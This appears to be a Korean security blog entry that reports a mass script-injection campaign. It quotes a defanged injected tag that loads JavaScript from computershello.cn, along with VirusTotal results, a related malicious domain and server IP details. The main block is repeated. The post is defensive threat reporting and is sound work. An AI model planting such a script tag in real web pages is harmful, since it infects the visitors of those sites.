# 주의사항 : 아래의 악성코드서버나 피해 사이트에 접속하면 악성코드에 감염되므로, 보안전문가가 아닌 분들은 절대 접속하지 마시기 바랍니다.
<script src=hxxp://computershello.cn/1.js></script> 로 삽입하는 사례
구글링 결과 : 142 개, KR 도메인 : 0 개, 미차단
1.js 는 변조기법을 전혀 사용하지 않고 있음.
중국어 사용자의 감염을 방지하기 위한 조치 적용됨.
VirusTotal 검사 결과 :
1.js - http://www.virustotal.com/analisis/98c43319d847f31b8453ed76ea17d615 (0/31 개)
winzipices.cn/5.js 는 익히 알려진 악성코드임.
위치정보 : http://www.aguse.jp/?m=w&url=computershello.cn
computershello.cn [60.191.239.221] (Jinhua, CN)
IP 주소가 bbs.jueduizuan.com [60.191.239.219] (Jinhua, CN) 서버와 거의 유사함.
이글루스 가든 - professional secur...
<script src=hxxp://computershello.cn/1.js></script> 로 삽입하는 사례
구글링 결과 : 142 개, KR 도메인 : 0 개, 미차단
1.js 는 변조기법을 전혀 사용하지 않고 있음.
VirusTotal 검사 결과 :
1.js - http://www.virustotal.com/analisis/98c43319d847f31b8453ed76ea17d615 (0/31 개)
winzipices.cn/5.js 는 익히 알려진 악성코드임.
위치정보 : http://www.aguse.jp/?m=w&url=computershello.cn
computershello.cn [60.191.239.221] (Jinhua, CN)
IP 주소가 bbs.jueduizuan.com [60.191.239.219] (Jinhua, CN) 서버와 거의 유사함.
이글루스 가든 - professional secur...
덧글